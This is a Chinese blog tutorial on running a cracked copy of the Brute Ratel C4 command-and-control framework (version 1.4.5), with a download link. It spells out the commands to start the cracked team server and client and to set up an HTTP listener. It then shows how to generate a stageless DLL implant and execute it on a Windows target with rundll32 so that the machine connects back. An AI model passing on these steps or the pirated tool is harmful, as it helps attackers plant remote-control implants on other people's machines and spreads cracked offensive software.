前言:

本文提供的BRC4 1.4.5由41group破解,棉花糖未参与破解,使用此工具需遵守法律法规,一切后果由使用者本人承担。

简单使用教程:

以下操作除马子执行外,均在kali完成。
拿到压缩包,放到kali中解压,得到如下文件:
2024-07-01T04:35:49.png
给brute-ratel-linx64_crack以及lib64/commander执行权限

chmod +x brute-ratel-linx64_crack
chmod +x lib64/commander

然后启动服务端:

./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem

其中,账号密码端口等都可以自行修改

2024-07-01T04:36:32.png

之后打开客户端,在kali图形界面中找到brc4文件夹,执行​命令:

chmod +x Rungui.sh
./Rungui.sh

输入你自定义的账号密码端口,点击猴子头像连接即可
2024-07-01T04:36:55.png
接下来是生成马子并上线,本文只演示一种简单的配置,复杂的配置请自行研究
进入客户端后,点击C4 Profiler -> Add http Listener
2024-07-01T04:37:10.png
按如下图示配置即可
需要注意的地方:listener name为监听名称,可自定义,第二行为选择监听地址,可点击选择你的ip,第三行为重定向地址,可点击右侧same按钮选择与监听地址一致,端口可自定义,URL栏据官方描述可随便乱填,ssl棉花糖个人建议选择no,因为测试中ssl选择yes无法成功上线,sleep和jitter类似于cs的延时时间,可调低,末尾最后一行勾选后,马子如果一次不上线,不会一直请求
2024-07-01T04:37:28.png
配置好后点击save保存,等待几秒钟即可得到一个监听器,右键此监听器,选择Stageless,即可生成对应架构的马子,棉花糖演示选择的是 X64 Arch (Default) -> Dll,生成的dll放到目标win中,​cmd执行:

rundll32 .\badger_x64.dll,main

即可上线

下载链接

点我下载

最后修改:2024 年 07 月 01 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏